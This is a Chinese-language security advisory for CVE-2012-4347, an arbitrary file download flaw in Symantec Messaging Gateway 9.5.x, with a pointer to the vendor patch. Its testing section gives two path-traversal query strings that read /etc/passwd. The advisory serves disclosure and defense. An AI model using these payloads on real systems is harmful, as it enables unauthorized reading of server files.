发布日期:2012-12-01
更新日期:2012-12-06
受影响系统:
Symantec Messaging Gateway 9.5.1
Symantec Messaging Gateway 9.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56789
CVE(CAN) ID: CVE-2012-4347
Symantec Messaging Gateway是赛门铁克的电子邮件病毒保护软件。
Symantec Messaging Gateway 9.5.x存在多个任意文件下载漏洞,攻击者可利用这些漏洞在Web服务器上下载任意文件。
<*来源:Ben Williams
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
?type=logs&amp;logFile=../../../etc/passwd&amp;logType=1&amp;browserType=1
?no-cache=false&amp;displayTab=restore&amp;restoreSource=APPLIANCE&amp;localBackupFileSelection=../../etc/passwd
建议:
--------------------------------------------------------------------------------
厂商补丁:
Symantec
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: